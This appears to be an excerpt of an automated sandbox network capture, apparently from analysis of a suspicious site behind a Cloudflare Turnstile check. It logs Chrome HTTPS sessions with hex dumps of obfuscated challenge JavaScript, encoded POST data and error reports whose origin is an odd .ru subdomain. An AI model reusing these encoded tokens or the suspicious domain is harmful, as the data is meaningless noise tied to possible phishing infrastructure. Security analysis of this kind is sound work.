                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 47 3d 64 5b 68 6d 28 37 38 32 29 5d 28 6f 2c 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 6d 28 38 39 39 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 68 6d 28 38 33 36 29 5d 28 46 2c 4b 29 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 6d 28 38 39 39 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 6d 28 31 34 30 35 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28
                                                                                                                              Data Ascii: G=d[hm(782)](o,I++));continue}break}switch(J){case 0:for(J=0,K=Math[hm(899)](2,8),F=1;d[hm(836)](F,K);N=H&G,H>>=1,H==0&&(H=j,G=o(I++)),J|=(0<N?1:0)*F,F<<=1);O=e(J);break;case 1:for(J=0,K=Math[hm(899)](2,16),F=1;K!=F;N=H&G,H>>=1,d[hm(1405)](0,H)&&(H=j,G=o(
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 69 53 69 71 70 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 2c 27 71 47 62 65 48 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 26 6d 7d 7d 2c 6b 2c 68 3d 33 32 2c 6a 3d 66 5b 68 58 28 31 33 30 38 29 5d 28 66 5b 68 58 28 31 33 30 38 29 5d 28 65 4d 5b 68 58 28 38 37 31 29 5d 5b 68 58 28 35 38 30 29 5d 2c 27 5f 27 29 2c 30 29 2c 6a 3d 6a 5b 68 58 28 39 37 39 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 68 59 29 7b 68 59 3d 68 58 2c 68 5e 3d 6a 5b 68 59 28 31 34 32 39 29 5d 28 6d 29 7d 29 2c 63 3d 65 4d 5b 68 58 28 31 32 38 36 29 5d 28 63 29 2c 69 3d 5b 5d 2c 67 3d 2d 31 3b 21 66 5b 68 58 28 38 38 34 29 5d 28 69
                                                                                                                              Data Ascii: tion(l,m){return l+m},'iSiqp':function(l,m){return l-m},'qGbeH':function(l,m){return l&m}},k,h=32,j=f[hX(1308)](f[hX(1308)](eM[hX(871)][hX(580)],'_'),0),j=j[hX(979)](/./g,function(l,m,hY){hY=hX,h^=j[hY(1429)](m)}),c=eM[hX(1286)](c),i=[],g=-1;!f[hX(884)](i
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 6a 65 63 74 5b 69 31 28 31 36 35 32 29 5d 28 66 5b 69 31 28 37 32 35 29 5d 29 29 3a 66 5b 69 31 28 37 32 35 29 5d 3d 4a 53 4f 4e 5b 69 31 28 39 36 31 29 5d 28 66 5b 69 31 28 37 32 35 29 5d 29 2c 6b 3d 69 5b 69 31 28 35 35 38 29 5d 28 68 2c 69 31 28 31 30 30 31 29 29 2c 6c 3d 65 4d 5b 69 31 28 38 37 31 29 5d 5b 69 31 28 35 32 33 29 5d 3f 69 5b 69 31 28 31 35 35 32 29 5d 28 69 5b 69 31 28 31 35 35 32 29 5d 28 27 68 2f 27 2c 65 4d 5b 69 31 28 38 37 31 29 5d 5b 69 31 28 35 32 33 29 5d 29 2c 27 2f 27 29 3a 27 27 2c 6d 3d 69 5b 69 31 28 31 34 35 34 29 5d 28 69 5b 69 31 28 31 32 35 39 29 5d 28 69 5b 69 31 28 31 32 35 39 29 5d 28 69 5b 69 31 28 34 33 39 29 5d 2b 6c 2b 69 5b 69 31 28 34 38 32 29 5d 2c 31 29 2b 69 31 28 37 38 36 29 2b 65 4d 5b 69 31 28 38 37 31 29
                                                                                                                              Data Ascii: ject[i1(1652)](f[i1(725)])):f[i1(725)]=JSON[i1(961)](f[i1(725)]),k=i[i1(558)](h,i1(1001)),l=eM[i1(871)][i1(523)]?i[i1(1552)](i[i1(1552)]('h/',eM[i1(871)][i1(523)]),'/'):'',m=i[i1(1454)](i[i1(1259)](i[i1(1259)](i[i1(439)]+l+i[i1(482)],1)+i1(786)+eM[i1(871)
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 31 36 29 5d 5b 69 32 28 36 39 37 29 5d 28 6f 2c 27 2a 27 29 29 29 3a 66 3d 4a 53 4f 4e 5b 69 32 28 39 36 31 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 69 32 28 31 33 39 38 29 5d 3d 66 2c 6d 5b 69 32 28 31 34 35 35 29 5d 3d 67 2c 6d 5b 69 32 28 31 32 30 38 29 5d 3d 68 2c 6d 5b 69 32 28 39 38 31 29 5d 3d 69 2c 6d 5b 69 32 28 37 32 35 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4a 28 39 32 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 69 34 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 69 34 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 69 34 28 35 34 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3d 3d 3d 76 7d 2c 6a 5b 69 34 28 31 32 35 38 29 5d 3d 69 34 28 36 30 33 29 2c 6a 5b 69 34 28 31 33 32 31 29 5d 3d
                                                                                                                              Data Ascii: 16)][i2(697)](o,'*'))):f=JSON[i2(961)](d);return m={},m[i2(1398)]=f,m[i2(1455)]=g,m[i2(1208)]=h,m[i2(981)]=i,m[i2(725)]=d,m},eM[gJ(929)]=function(e,f,g,h,i,i4,j,k,l,m,n,o){(i4=gJ,j={},j[i4(548)]=function(s,v){return s===v},j[i4(1258)]=i4(603),j[i4(1321)]=


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              18192.168.2.449765104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:07 UTC1174OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1622837158:1733341834:Dc9KQflSkPZkmMEtyak2vrZSKicoXy7NaQkbVZnHHyQ/8ece78d77fea8c95/vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 3055
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                              CF-Chl-RetryAttempt: 0
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              CF-Challenge: vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:07 UTC3055OUTData Raw: 76 5f 38 65 63 65 37 38 64 37 37 66 65 61 38 63 39 35 3d 25 32 62 35 45 68 53 68 6b 68 2b 68 73 68 70 2d 59 78 2d 59 71 68 2d 77 68 48 72 45 74 59 51 2d 32 31 59 39 6d 59 43 72 61 72 2d 77 6b 59 32 68 2b 45 2d 67 63 45 59 50 76 42 72 70 74 36 38 30 59 57 37 68 59 66 77 59 6b 72 43 46 59 58 24 36 4d 59 24 58 72 43 38 59 4b 72 59 31 59 42 24 59 62 63 44 68 43 74 59 30 59 70 74 36 61 47 79 74 74 67 39 73 4c 61 59 36 76 73 6e 33 79 63 4c 30 59 69 31 38 6f 49 53 61 57 79 62 51 46 6e 42 59 34 45 59 73 34 37 6d 44 59 68 4e 66 68 74 54 44 61 6d 65 76 6b 79 5a 51 61 61 4c 2b 76 37 59 51 42 56 75 2d 44 37 56 59 44 4b 59 72 72 59 44 63 72 59 53 4b 42 68 59 49 41 72 53 78 6b 68 30 38 59 36 33 78 43 68 59 63 78 37 65 33 72 66 71 70 68 59 56 38 4e 24 73 59 44 30 69 36
                                                                                                                              Data Ascii: v_8ece78d77fea8c95=%2b5EhShkh+hshp-Yx-Yqh-whHrEtYQ-21Y9mYCrar-wkY2h+E-gcEYPvBrpt680YW7hYfwYkrCFYX$6MY$XrC8YKrY1YB$YbcDhCtY0Ypt6aGyttg9sLaY6vsn3ycL0Yi18oISaWybQFnBY4EYs47mDYhNfhtTDamevkyZQaaL+v7YQBVu-D7VYDKYrrYDcrYSKBhYIArSxkh08Y63xChYcx7e3rfqphYV8N$sYD0i6
                                                                                                                              2024-12-04 20:16:08 UTC747INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:08 GMT
                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                              Content-Length: 149792
                                                                                                                              Connection: close
                                                                                                                              cf-chl-gen: nHAPY37xj0yZoHGu8q5WRwR/fLkJjo8MCNMUCLTcq/bBiNcdsgvDibhetjSRhL5SPjs9SEUlCzIeaRR33opjaQN8pTdnA+Nb5+nJtAHRWLT6YlzrLKMegmp1UokXXylIS2zzs7F3hczTmZrHk7twDh3SycGlnhGDIJrQ8+ipL8JYKsFCa45/6n2N459yxZIm/jO4cQBLGSODQnRsHmK2rOofqk1SeDm+yr3pnq586GEw0bc9rTQPD0Q4K5KTrT2DUr5Bc2/F8mrQ+sUItTWp9nOnLGcE5NLvjnfM4ciHYtcW8IR5CLop+mVDRPvryiraLgfrvSyDUDNzoiIl5ybqOOcoeNb3tGNpcg2IujPIMkLseBdH71QXuzUPHUPzR/dH89xriTmKoEjjsI7sYpHFvT+kVqmIjKMJyX/vnUhmHhcHhq9gXytrFcfekCblPdDTfQ3GDC6gKU7/0He6/yankLt8ZAKbVPwOGPyOHWam4Npum7g=$qPldbGaBTyanxdo9
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece78f1c9d043e9-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:08 UTC622INData Raw: 65 37 65 33 70 6f 4b 49 74 71 53 45 6f 49 32 72 79 4d 57 66 76 4b 61 76 76 34 32 74 79 62 58 56 31 4b 79 30 72 4e 71 33 73 4e 4b 56 30 72 4b 31 31 61 54 41 79 65 4c 47 76 4f 69 35 37 75 7a 4e 35 65 53 72 38 4d 61 34 34 62 66 30 75 74 48 39 31 4c 62 64 30 66 7a 39 7a 37 30 4a 35 2f 50 46 42 73 59 47 32 75 62 72 44 41 66 72 37 76 62 66 37 4f 50 51 47 52 6b 63 38 67 6a 76 32 67 37 31 46 52 6f 53 2b 52 66 34 47 65 51 62 36 43 34 64 2f 69 6f 61 2b 69 55 53 41 69 6f 4a 4b 7a 6a 34 42 42 44 32 4b 66 67 70 48 68 51 50 48 55 51 6f 45 79 46 41 46 68 67 6a 42 68 73 70 4c 6a 34 67 49 55 78 58 55 43 49 5a 4f 68 4a 55 4d 56 74 4d 58 45 42 65 4c 54 64 6c 56 46 77 36 57 53 46 68 54 44 64 47 59 6b 59 76 4d 45 39 45 4c 45 68 6a 65 55 64 43 4c 57 74 4a 65 55 39 54 62 6a 70
                                                                                                                              Data Ascii: e7e3poKItqSEoI2ryMWfvKavv42tybXV1Ky0rNq3sNKV0rK11aTAyeLGvOi57uzN5eSr8Ma44bf0utH91Lbd0fz9z70J5/PFBsYG2ubrDAfr7vbf7OPQGRkc8gjv2g71FRoS+Rf4GeQb6C4d/ioa+iUSAioJKzj4BBD2KfgpHhQPHUQoEyFAFhgjBhspLj4gIUxXUCIZOhJUMVtMXEBeLTdlVFw6WSFhTDdGYkYvME9ELEhjeUdCLWtJeU9Tbjp
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 71 59 67 6d 68 6c 58 46 64 71 64 47 74 75 56 47 46 7a 58 48 71 63 68 71 42 70 71 48 69 73 6c 71 53 4d 6a 61 2b 30 66 47 35 75 63 48 57 42 6b 6f 52 79 74 49 32 4b 65 6e 32 66 6b 5a 69 6c 6f 61 4c 45 6b 61 47 6a 78 62 32 47 70 61 4f 6d 70 38 47 71 72 4d 71 30 7a 38 47 6b 6f 37 6d 34 6d 64 57 65 6e 74 37 65 33 72 61 6d 34 75 61 33 78 63 4c 6f 34 71 6a 73 76 64 2f 75 38 72 4f 78 76 75 37 44 34 66 54 4b 35 2b 72 52 37 76 4f 36 32 2b 43 32 34 38 38 42 33 77 50 46 44 64 38 4f 42 4f 6e 6c 41 4f 37 53 34 64 55 53 38 75 62 55 42 76 48 30 31 50 54 52 32 50 6f 4f 2b 77 62 6b 33 68 77 56 38 52 73 66 4b 67 34 63 36 4f 63 61 42 78 41 4b 4a 2f 4d 74 4b 51 55 72 48 53 34 5a 4b 78 6f 33 47 78 6b 42 52 42 52 49 4d 77 4a 4b 50 7a 5a 43 47 43 6f 37 53 78 45 67 43 6b 73 57 54
                                                                                                                              Data Ascii: qYgmhlXFdqdGtuVGFzXHqchqBpqHislqSMja+0fG5ucHWBkoRytI2Ken2fkZiloaLEkaGjxb2GpaOmp8GqrMq0z8Gko7m4mdWent7e3ram4ua3xcLo4qjsvd/u8rOxvu7D4fTK5+rR7vO62+C2488B3wPFDd8OBOnlAO7S4dUS8ubUBvH01PTR2PoO+wbk3hwV8RsfKg4c6OcaBxAKJ/MtKQUrHS4ZKxo3GxkBRBRIMwJKPzZCGCo7SxEgCksWT
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 78 63 6f 71 43 6c 6d 4b 44 65 48 78 67 6b 35 71 65 68 6c 36 6c 5a 34 36 45 66 59 6d 79 6b 71 6d 56 6a 71 57 49 73 49 32 35 65 33 43 4d 76 5a 61 59 73 71 4f 45 6a 34 4f 47 6f 34 47 71 68 4d 47 57 7a 36 6d 6e 6b 61 66 47 79 72 47 6c 77 72 61 34 76 4c 69 6f 78 35 36 30 30 4c 7a 6a 73 4a 76 52 78 71 65 2b 79 2b 57 6a 31 73 72 65 36 74 4c 50 77 4f 61 76 34 2b 54 69 37 4e 58 55 7a 72 6d 35 32 4d 69 33 39 50 57 32 35 73 54 6c 2b 76 54 47 35 51 33 57 33 67 6e 47 36 75 67 4e 43 64 48 56 36 75 58 59 43 2f 6a 74 48 52 58 58 31 76 62 61 38 39 77 45 37 75 41 6b 2b 75 54 69 41 65 73 6e 36 53 6b 4c 41 69 4d 32 49 53 77 5a 46 44 6f 58 48 42 4c 7a 4a 2f 45 37 50 54 50 38 4f 69 63 43 52 77 67 54 47 43 78 46 51 51 6f 71 4c 45 4a 4a 45 53 45 2b 54 55 51 77 53 53 74 45 4f 6b
                                                                                                                              Data Ascii: xcoqClmKDeHxgk5qehl6lZ46EfYmykqmVjqWIsI25e3CMvZaYsqOEj4OGo4GqhMGWz6mnkafGyrGlwra4vLiox5600LzjsJvRxqe+y+Wj1sre6tLPwOav4+Ti7NXUzrm52Mi39PW25sTl+vTG5Q3W3gnG6ugNCdHV6uXYC/jtHRXX1vba89wE7uAk+uTiAesn6SkLAiM2ISwZFDoXHBLzJ/E7PTP8OicCRwgTGCxFQQoqLEJJESE+TUQwSStEOk
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 67 6e 4b 59 6f 36 4b 57 61 35 75 62 71 6d 75 66 62 61 65 78 6f 36 2b 50 73 62 47 36 72 37 52 79 66 4a 2b 30 6a 59 6d 57 77 59 31 37 6d 6e 32 49 65 35 36 65 69 4b 71 64 68 36 32 49 71 4d 53 74 6f 4b 69 6f 30 72 69 55 71 5a 4b 57 6e 62 75 58 76 73 71 5a 78 4c 43 67 70 2b 47 70 71 4d 44 61 77 65 47 6d 78 4c 6e 63 71 64 48 74 73 38 6d 77 36 2b 61 7a 37 64 48 31 76 50 7a 71 33 64 2f 51 41 74 6e 64 77 2b 50 62 42 76 7a 32 78 2b 4c 67 33 68 4c 75 36 78 45 58 38 78 63 59 45 2f 41 4d 2f 75 67 56 38 69 45 50 48 4e 7a 2b 38 51 4d 56 47 79 41 69 34 67 66 6d 36 78 49 47 41 43 34 4b 48 2f 49 72 49 69 4d 6d 4f 69 6f 39 2f 67 6b 69 49 52 62 35 2f 54 38 44 2f 53 42 4c 48 77 49 47 54 55 51 4e 4c 42 31 4f 54 6a 49 74 45 69 42 54 4a 43 39 50 54 6c 39 4e 48 47 46 68 4d 6c 31
                                                                                                                              Data Ascii: gnKYo6KWa5ubqmufbaexo6+PsbG6r7RyfJ+0jYmWwY17mn2Ie56eiKqdh62IqMStoKio0riUqZKWnbuXvsqZxLCgp+GpqMDaweGmxLncqdHts8mw6+az7dH1vPzq3d/QAtndw+PbBvz2x+Lg3hLu6xEX8xcYE/AM/ugV8iEPHNz+8QMVGyAi4gfm6xIGAC4KH/IrIiMmOio9/gkiIRb5/T8D/SBLHwIGTUQNLB1OTjItEiBTJC9PTl9NHGFhMl1
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 6e 32 75 65 34 6d 4a 6f 5a 2b 6d 67 49 57 4b 71 49 75 49 6d 4b 4e 37 76 6f 79 2f 75 5a 71 39 74 4b 57 68 78 73 69 39 6c 72 57 2f 77 4d 54 48 77 38 2b 71 30 4b 69 2f 71 73 69 33 75 62 4f 6c 73 62 6e 4e 76 39 2f 49 71 73 4f 79 30 39 2b 2b 73 37 75 33 34 4c 71 34 34 61 66 71 78 72 43 73 36 4b 7a 31 74 75 7a 58 34 73 33 75 35 50 33 38 75 77 47 37 38 63 50 64 77 64 6a 67 36 4d 55 45 77 73 4c 5a 32 66 73 51 37 4f 45 54 33 4f 48 6b 7a 67 34 51 46 64 62 56 38 77 44 33 46 78 58 37 37 65 4c 78 41 79 66 61 42 51 73 61 4c 42 34 58 43 41 55 70 48 2f 37 74 38 42 51 33 39 42 6b 6d 4c 66 76 32 47 68 6f 74 2b 52 6f 52 46 53 49 57 46 54 6f 61 4f 30 63 4c 49 52 67 2b 4c 7a 6f 7a 52 6b 49 55 4d 6c 4d 78 52 44 6f 59 57 45 59 32 47 7a 70 54 55 68 77 6a 59 6c 45 37 61 53 68 6e
                                                                                                                              Data Ascii: n2ue4mJoZ+mgIWKqIuImKN7voy/uZq9tKWhxsi9lrW/wMTHw8+q0Ki/qsi3ubOlsbnNv9/IqsOy09++s7u34Lq44afqxrCs6Kz1tuzX4s3u5P38uwG78cPdwdjg6MUEwsLZ2fsQ7OET3OHkzg4QFdbV8wD3FxX77eLxAyfaBQsaLB4XCAUpH/7t8BQ39BkmLfv2Ghot+RoRFSIWFToaO0cLIRg+LzozRkIUMlMxRDoYWEY2GzpTUhwjYlE7aShn
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 79 50 73 59 31 6f 6e 35 4b 54 6f 36 35 34 75 71 68 31 67 48 65 2f 6d 72 69 44 67 59 2b 68 6f 62 75 2f 75 38 4c 46 67 61 36 71 6f 38 32 71 6c 4d 50 4c 6c 4d 61 36 6c 6f 36 78 33 39 58 64 33 36 2b 76 72 70 66 68 33 4e 4c 6e 35 65 69 38 70 36 37 43 77 61 76 48 73 65 47 2b 79 2f 4c 4f 7a 64 58 77 74 64 54 61 76 4d 76 70 30 62 2f 34 31 4f 37 48 77 76 37 59 43 2b 72 57 44 4d 48 51 7a 4f 62 38 34 52 44 57 45 65 66 54 37 77 33 70 37 68 7a 52 33 51 44 74 49 42 62 39 45 77 4c 35 38 65 55 62 39 51 58 6e 4b 67 34 52 4d 79 77 48 4a 50 4c 30 42 69 77 63 4f 69 55 30 4e 42 6b 34 47 78 30 36 52 68 70 48 50 67 4d 67 52 77 64 41 49 68 6f 6b 55 69 52 45 50 68 49 6d 53 52 4d 53 4c 55 73 34 57 78 78 50 46 78 6f 31 55 30 42 6a 4e 6c 64 69 5a 7a 73 32 54 43 52 43 63 44 68 6a 52
                                                                                                                              Data Ascii: yPsY1on5KTo654uqh1gHe/mriDgY+hobu/u8LFga6qo82qlMPLlMa6lo6x39Xd36+vrpfh3NLn5ei8p67CwavHseG+y/LOzdXwtdTavMvp0b/41O7Hwv7YC+rWDMHQzOb84RDWEefT7w3p7hzR3QDtIBb9EwL58eUb9QXnKg4RMywHJPL0BiwcOiU0NBk4Gx06RhpHPgMgRwdAIhokUiREPhImSRMSLUs4WxxPFxo1U0BjNldiZzs2TCRCcDhjR
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 71 6a 58 53 45 6a 34 65 30 69 62 32 36 75 35 43 68 78 73 4f 5a 76 49 69 71 71 73 7a 42 78 6f 33 42 72 37 2b 72 6c 64 57 67 70 4e 50 45 6c 64 32 75 76 4a 76 4e 6f 4b 79 34 6f 74 43 36 30 4d 69 39 70 75 4c 61 72 4b 37 73 33 71 69 2b 30 4f 6a 64 38 4c 61 75 32 63 72 4f 36 39 62 49 2b 51 4c 79 32 51 4c 76 35 72 6a 64 2f 65 62 38 33 2b 49 4f 45 41 76 69 35 76 33 46 78 75 37 68 38 4e 50 6e 30 42 41 58 43 2f 37 65 49 76 58 73 33 69 62 62 39 53 55 52 42 53 77 45 35 51 41 63 48 67 67 7a 38 67 73 4c 37 53 49 50 46 44 44 34 4a 68 34 74 4d 69 76 39 51 6a 59 34 48 55 51 56 52 30 59 33 41 6b 6c 49 43 43 70 4e 49 30 70 47 53 54 38 6d 4e 69 55 35 4a 30 73 57 56 31 4d 76 45 6c 59 35 51 69 78 50 4f 31 78 61 52 45 45 6c 4b 56 31 66 4a 69 49 36 63 33 4a 4d 52 55 74 32 51 53
                                                                                                                              Data Ascii: qjXSEj4e0ib26u5ChxsOZvIiqqszBxo3Br7+rldWgpNPEld2uvJvNoKy4otC60Mi9puLarK7s3qi+0Ojd8Lau2crO69bI+QLy2QLv5rjd/eb83+IOEAvi5v3Fxu7h8NPn0BAXC/7eIvXs3ibb9SURBSwE5QAcHggz8gsL7SIPFDD4Jh4tMiv9QjY4HUQVR0Y3AklICCpNI0pGST8mNiU5J0sWV1MvElY5QixPO1xaREElKV1fJiI6c3JMRUt2QS
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 74 4d 47 77 76 5a 47 5a 6c 59 2b 79 6d 37 2b 39 70 35 36 58 79 70 33 4a 6d 38 47 4c 6e 71 54 4a 6c 74 62 57 72 63 53 39 70 74 4f 59 71 37 47 77 7a 4d 2b 37 33 4e 6d 69 75 72 6a 4d 32 38 44 68 79 65 6d 37 77 65 6e 42 78 65 72 69 35 63 54 4a 74 50 7a 7a 30 2b 43 2b 38 38 37 2b 30 4c 7a 78 2b 38 67 4a 34 63 4d 48 7a 50 72 72 36 74 6f 4a 42 65 4d 50 43 38 38 4a 35 4f 73 51 38 75 62 75 44 67 2f 67 32 2f 34 6b 47 52 67 57 32 77 51 63 42 43 76 6d 48 75 6f 72 41 65 77 57 4d 54 67 4d 4d 51 55 48 50 44 49 54 4c 7a 78 42 2b 78 34 76 4a 41 59 47 41 6a 59 39 50 52 59 45 44 42 78 4a 4d 67 6f 39 4a 31 56 4f 44 6a 49 73 53 69 30 74 4c 6a 74 54 4e 57 45 63 48 54 73 38 56 44 46 6d 4e 57 70 4a 51 7a 38 35 5a 45 4e 66 51 53 74 44 61 47 31 45 61 54 6c 33 56 6a 74 57 4e 58 51
                                                                                                                              Data Ascii: tMGwvZGZlY+ym7+9p56Xyp3Jm8GLnqTJltbWrcS9ptOYq7GwzM+73NmiurjM28Dhyem7wenBxeri5cTJtPzz0+C+887+0Lzx+8gJ4cMHzPrr6toJBeMPC88J5OsQ8ubuDg/g2/4kGRgW2wQcBCvmHuorAewWMTgMMQUHPDITLzxB+x4vJAYGAjY9PRYEDBxJMgo9J1VODjIsSi0tLjtTNWEcHTs8VDFmNWpJQz85ZENfQStDaG1EaTl3VjtWNXQ
                                                                                                                              2024-12-04 20:16:08 UTC1369INData Raw: 73 47 70 77 4d 44 4c 71 61 69 73 6d 61 48 45 79 6f 37 48 71 74 61 67 73 64 53 72 6c 4b 37 4b 73 71 32 65 32 37 76 44 73 4e 65 2f 70 2b 54 61 32 38 50 67 31 72 76 6d 6f 73 6d 38 35 66 58 31 33 74 50 54 75 62 65 7a 79 74 66 50 38 63 44 34 39 64 6a 51 75 39 6b 45 43 4f 6a 61 77 67 55 4e 7a 67 41 46 77 78 48 69 44 73 2f 66 44 2b 73 44 43 66 59 50 31 78 66 32 48 79 41 66 45 2f 48 2b 33 67 59 52 46 76 4d 64 2f 68 38 6a 36 41 37 6e 4e 41 45 6b 49 43 77 56 2b 50 63 51 4a 76 77 64 42 79 30 4c 44 7a 2f 37 47 7a 38 44 48 79 51 68 43 41 74 4b 53 77 39 50 52 54 73 73 45 30 63 72 44 55 51 78 54 6b 77 6c 55 43 35 41 57 45 4a 63 47 32 4d 37 55 53 38 69 50 6d 46 6a 4a 55 52 65 51 45 41 73 53 30 5a 48 52 55 59 79 4c 6b 4a 73 4d 31 56 4e 50 46 45 36 66 6c 70 35 56 34 46 6d
                                                                                                                              Data Ascii: sGpwMDLqaismaHEyo7HqtagsdSrlK7Ksq2e27vDsNe/p+Ta28Pg1rvmosm85fX13tPTubezytfP8cD49djQu9kECOjawgUNzgAFwxHiDs/fD+sDCfYP1xf2HyAfE/H+3gYRFvMd/h8j6A7nNAEkICwV+PcQJvwdBy0LDz/7Gz8DHyQhCAtKSw9PRTssE0crDUQxTkwlUC5AWEJcG2M7US8iPmFjJUReQEAsS0ZHRUYyLkJsM1VNPFE6flp5V4Fm


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              19192.168.2.44976735.190.80.14433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:08 UTC532OUTOPTIONS /report/v4?s=6A7Qg2px6KUksXvNOjWYClXGu2aZaEH9QCjBy1XqFlPrbT2IBv5zpIVyHR8b0tuPBpOYnVpgEJ1aqDscypHjmeTtQN6H%2B50RyD%2Bcbw1Sb6SvvIvqiG3OYIf5zKk5Yg%3D%3D HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Origin: https://h6n.xswpbsmx.ru
                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:08 UTC336INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              access-control-max-age: 86400
                                                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                                                              access-control-allow-origin: *
                                                                                                                              access-control-allow-headers: content-type, content-length
                                                                                                                              date: Wed, 04 Dec 2024 20:16:08 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              20192.168.2.44977135.190.80.14433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:10 UTC474OUTPOST /report/v4?s=6A7Qg2px6KUksXvNOjWYClXGu2aZaEH9QCjBy1XqFlPrbT2IBv5zpIVyHR8b0tuPBpOYnVpgEJ1aqDscypHjmeTtQN6H%2B50RyD%2Bcbw1Sb6SvvIvqiG3OYIf5zKk5Yg%3D%3D HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 426
                                                                                                                              Content-Type: application/reports+json
